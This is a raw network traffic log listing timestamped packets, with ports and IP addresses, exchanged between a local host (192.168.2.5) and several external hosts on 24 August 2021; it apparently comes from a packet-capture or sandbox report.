Aug 24, 2021 08:49:27.928103924 CEST	2080	49720	185.49.70.90	192.168.2.5
Aug 24, 2021 08:49:27.928169012 CEST	49720	2080	192.168.2.5	185.49.70.90
Aug 24, 2021 08:49:27.928174973 CEST	49720	2080	192.168.2.5	185.49.70.90
Aug 24, 2021 08:49:27.928320885 CEST	2080	49720	185.49.70.90	192.168.2.5
Aug 24, 2021 08:49:27.928339005 CEST	2080	49720	185.49.70.90	192.168.2.5
Aug 24, 2021 08:49:27.928361893 CEST	2080	49720	185.49.70.90	192.168.2.5
Aug 24, 2021 08:49:27.928380013 CEST	2080	49720	185.49.70.90	192.168.2.5
Aug 24, 2021 08:49:27.928390026 CEST	2080	49720	185.49.70.90	192.168.2.5
Aug 24, 2021 08:49:27.928407907 CEST	2080	49720	185.49.70.90	192.168.2.5
Aug 24, 2021 08:49:27.928425074 CEST	2080	49720	185.49.70.90	192.168.2.5
Aug 24, 2021 08:49:27.928442955 CEST	2080	49720	185.49.70.90	192.168.2.5
Aug 24, 2021 08:49:27.928464890 CEST	2080	49720	185.49.70.90	192.168.2.5
Aug 24, 2021 08:49:27.928483009 CEST	49720	2080	192.168.2.5	185.49.70.90
Aug 24, 2021 08:49:27.928489923 CEST	49720	2080	192.168.2.5	185.49.70.90
Aug 24, 2021 08:49:27.928497076 CEST	2080	49720	185.49.70.90	192.168.2.5
Aug 24, 2021 08:49:27.928519011 CEST	2080	49720	185.49.70.90	192.168.2.5
Aug 24, 2021 08:49:27.928520918 CEST	49720	2080	192.168.2.5	185.49.70.90
Aug 24, 2021 08:49:27.928524971 CEST	49720	2080	192.168.2.5	185.49.70.90
Aug 24, 2021 08:49:27.928529978 CEST	2080	49720	185.49.70.90	192.168.2.5
Aug 24, 2021 08:49:27.928550959 CEST	2080	49720	185.49.70.90	192.168.2.5
Aug 24, 2021 08:49:27.928560972 CEST	49720	2080	192.168.2.5	185.49.70.90
Aug 24, 2021 08:49:27.928569078 CEST	2080	49720	185.49.70.90	192.168.2.5
Aug 24, 2021 08:49:27.928586006 CEST	2080	49720	185.49.70.90	192.168.2.5
Aug 24, 2021 08:49:27.928603888 CEST	2080	49720	185.49.70.90	192.168.2.5
Aug 24, 2021 08:49:27.928622007 CEST	2080	49720	185.49.70.90	192.168.2.5
Aug 24, 2021 08:49:27.928623915 CEST	49720	2080	192.168.2.5	185.49.70.90
Aug 24, 2021 08:49:27.928632975 CEST	2080	49720	185.49.70.90	192.168.2.5
Aug 24, 2021 08:49:27.928652048 CEST	49720	2080	192.168.2.5	185.49.70.90
Aug 24, 2021 08:49:27.928656101 CEST	2080	49720	185.49.70.90	192.168.2.5
Aug 24, 2021 08:49:27.928673983 CEST	2080	49720	185.49.70.90	192.168.2.5
Aug 24, 2021 08:49:27.928687096 CEST	49720	2080	192.168.2.5	185.49.70.90
Aug 24, 2021 08:49:27.928690910 CEST	2080	49720	185.49.70.90	192.168.2.5
Aug 24, 2021 08:49:27.928709030 CEST	2080	49720	185.49.70.90	192.168.2.5
Aug 24, 2021 08:49:27.928714037 CEST	49720	2080	192.168.2.5	185.49.70.90
Aug 24, 2021 08:49:27.928726912 CEST	2080	49720	185.49.70.90	192.168.2.5
Aug 24, 2021 08:49:27.928745031 CEST	2080	49720	185.49.70.90	192.168.2.5
Aug 24, 2021 08:49:27.928755045 CEST	2080	49720	185.49.70.90	192.168.2.5
Aug 24, 2021 08:49:27.928771973 CEST	2080	49720	185.49.70.90	192.168.2.5
Aug 24, 2021 08:49:27.928790092 CEST	2080	49720	185.49.70.90	192.168.2.5
Aug 24, 2021 08:49:27.928807020 CEST	49720	2080	192.168.2.5	185.49.70.90
Aug 24, 2021 08:49:27.928807974 CEST	2080	49720	185.49.70.90	192.168.2.5
Aug 24, 2021 08:49:27.928812981 CEST	49720	2080	192.168.2.5	185.49.70.90
Aug 24, 2021 08:49:27.928827047 CEST	2080	49720	185.49.70.90	192.168.2.5
Aug 24, 2021 08:49:27.928843021 CEST	49720	2080	192.168.2.5	185.49.70.90
Aug 24, 2021 08:49:27.928843975 CEST	2080	49720	185.49.70.90	192.168.2.5
Aug 24, 2021 08:49:27.928862095 CEST	2080	49720	185.49.70.90	192.168.2.5
Aug 24, 2021 08:49:27.928872108 CEST	2080	49720	185.49.70.90	192.168.2.5
Aug 24, 2021 08:49:27.928889990 CEST	2080	49720	185.49.70.90	192.168.2.5
Aug 24, 2021 08:49:27.928906918 CEST	2080	49720	185.49.70.90	192.168.2.5
Aug 24, 2021 08:49:27.928916931 CEST	2080	49720	185.49.70.90	192.168.2.5
Aug 24, 2021 08:49:27.928916931 CEST	49720	2080	192.168.2.5	185.49.70.90
Aug 24, 2021 08:49:27.928921938 CEST	49720	2080	192.168.2.5	185.49.70.90
Aug 24, 2021 08:49:27.928965092 CEST	49720	2080	192.168.2.5	185.49.70.90
Aug 24, 2021 08:49:27.933995962 CEST	49720	2080	192.168.2.5	185.49.70.90
Aug 24, 2021 08:49:27.934541941 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:27.940000057 CEST	49719	14462	192.168.2.5	185.230.143.48
Aug 24, 2021 08:49:27.951513052 CEST	2080	49720	185.49.70.90	192.168.2.5
Aug 24, 2021 08:49:27.951543093 CEST	2080	49720	185.49.70.90	192.168.2.5
Aug 24, 2021 08:49:27.951560974 CEST	2080	49720	185.49.70.90	192.168.2.5
Aug 24, 2021 08:49:27.951589108 CEST	2080	49720	185.49.70.90	192.168.2.5
Aug 24, 2021 08:49:27.951622009 CEST	2080	49720	185.49.70.90	192.168.2.5
Aug 24, 2021 08:49:27.951634884 CEST	49720	2080	192.168.2.5	185.49.70.90
Aug 24, 2021 08:49:27.951689005 CEST	2080	49720	185.49.70.90	192.168.2.5
Aug 24, 2021 08:49:27.951695919 CEST	49720	2080	192.168.2.5	185.49.70.90
Aug 24, 2021 08:49:27.951708078 CEST	2080	49720	185.49.70.90	192.168.2.5
Aug 24, 2021 08:49:27.951719999 CEST	2080	49720	185.49.70.90	192.168.2.5
Aug 24, 2021 08:49:27.951762915 CEST	49720	2080	192.168.2.5	185.49.70.90
Aug 24, 2021 08:49:27.952579021 CEST	2080	49720	185.49.70.90	192.168.2.5
Aug 24, 2021 08:49:27.952620983 CEST	2080	49720	185.49.70.90	192.168.2.5
Aug 24, 2021 08:49:27.952686071 CEST	49720	2080	192.168.2.5	185.49.70.90
Aug 24, 2021 08:49:27.991018057 CEST	14462	49719	185.230.143.48	192.168.2.5
Aug 24, 2021 08:49:27.991039038 CEST	14462	49719	185.230.143.48	192.168.2.5
Aug 24, 2021 08:49:27.991112947 CEST	49719	14462	192.168.2.5	185.230.143.48
Aug 24, 2021 08:49:28.026526928 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:28.047096968 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:28.047153950 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:28.047174931 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:28.047190905 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:28.047199965 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:28.047209024 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:28.047220945 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:28.047226906 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:28.047250986 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:28.047271013 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:28.047276974 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:28.047286987 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:28.047310114 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:28.047329903 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:28.047573090 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:28.067733049 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:28.067755938 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:28.067785025 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:28.067801952 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:28.067820072 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:28.067836046 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:28.067852020 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:28.067864895 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:28.067873001 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:28.067893028 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:28.068007946 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:28.068026066 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:28.068046093 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:28.068057060 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:28.068067074 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:28.068088055 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:28.068092108 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:28.068104029 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:28.068119049 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:28.068123102 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:28.068135023 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:28.068155050 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:28.068161011 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:28.068170071 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:28.068192005 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:28.068192005 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:28.068207979 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:28.068228960 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:28.068860054 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:28.088252068 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:28.088278055 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:28.088304043 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:28.088321924 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:28.088340044 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:28.088363886 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:28.088366032 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:28.088383913 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:28.088399887 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:28.088412046 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:28.088429928 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:28.088454008 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:28.088471889 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:28.088485003 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:28.088490009 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:28.088507891 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:28.088531017 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:28.088547945 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:28.088551044 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:28.088556051 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:28.088557959 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:28.088562012 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:28.088566065 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:28.088587046 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:28.088587046 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:28.088604927 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:28.088625908 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:28.088644028 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:28.088665009 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:28.088682890 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:28.088705063 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:28.088722944 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:28.088741064 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:28.088762999 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:28.088782072 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:28.088803053 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:28.088820934 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:28.088839054 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:28.088856936 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:28.088874102 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:28.088896990 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:28.088915110 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:28.088970900 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:28.088985920 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:28.088989019 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:28.088992119 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:28.088994980 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:28.088999033 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:28.089001894 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:28.089004993 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:28.089008093 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:28.089010954 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:28.089014053 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:28.089241028 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:28.089261055 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:28.089282990 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:28.089299917 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:28.089318991 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:28.089337111 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:28.089375019 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:28.089387894 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:28.089390993 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:28.089401007 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:28.109482050 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:28.109508991 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:28.109535933 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:28.109554052 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:28.109571934 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:28.109596014 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:28.109597921 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:28.109613895 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:28.109632969 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:28.109633923 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:28.109657049 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:28.109724045 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:28.109811068 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:28.109834909 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:28.109844923 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:28.109852076 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:28.109869957 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:28.109870911 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:28.109886885 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:28.109888077 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:28.109905958 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:28.109924078 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:28.109941006 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:28.109942913 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:28.109961033 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:28.109977961 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:28.109981060 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:28.109997034 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:28.110013962 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:28.110014915 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:28.110032082 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:28.110049963 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:28.110050917 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:28.110068083 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:28.110085011 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:28.110090017 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:28.110104084 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:28.110127926 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:28.110127926 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:28.110146046 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:28.110163927 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:28.110163927 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:28.110182047 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:28.110198975 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:28.110202074 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:28.110217094 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:28.110236883 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:28.110239029 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:28.110256910 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:28.110259056 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:28.110274076 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:28.110294104 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:28.110299110 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:28.110311985 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:28.110331059 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:28.110337019 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:28.110352039 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:28.110361099 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:28.110384941 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:28.110474110 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:28.236414909 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:28.257180929 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:28.257206917 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:28.257316113 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:28.257334948 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:28.257395983 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:28.257435083 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:28.257442951 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:28.257457018 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:28.257494926 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:28.257503033 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:28.257538080 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:28.257543087 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:28.257597923 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:28.257667065 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:28.257716894 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:28.257723093 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:28.257749081 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:28.257756948 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:28.257782936 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:28.257783890 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:28.257801056 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:28.257838011 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:28.257854939 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:28.257865906 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:28.257874012 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:28.257890940 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:28.257898092 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:28.257913113 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:28.257929087 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:28.257936001 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:28.257946968 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:28.257961988 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:28.257966042 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:28.257983923 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:28.257987976 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:28.258002043 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:28.258019924 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:28.258034945 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:28.258038998 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:28.258055925 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:28.258076906 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:28.258094072 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:28.258097887 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:28.258111954 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:28.258116007 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:28.258131027 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:28.258145094 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:28.258147955 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:28.258166075 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:28.258188009 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:28.258205891 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:28.258213997 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:28.258224010 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:28.258229017 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:28.258241892 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:28.258259058 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:28.258265018 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:28.258281946 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:28.258285999 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:28.258300066 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:28.258316994 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:28.258321047 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:28.258341074 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:28.258347988 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:28.258358955 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:28.258369923 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:28.258377075 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:28.258394957 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:28.258394957 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:28.258413076 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:28.258430004 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:28.258435011 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:28.258452892 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:28.258471012 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:28.258475065 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:28.258492947 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:28.258497000 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:28.258512020 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:28.258528948 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:28.258549929 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:28.258569002 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:28.258585930 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:28.258589983 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:28.258591890 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:28.258609056 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:28.258611917 CEST	49718	80	192.168.2.5	188.34.200.103
Aug 24, 2021 08:49:28.258625984 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:28.258644104 CEST	80	49718	188.34.200.103	192.168.2.5
Aug 24, 2021 08:49:28.258649111 CEST	49718	80	192.168.2.5	188.34.200.103
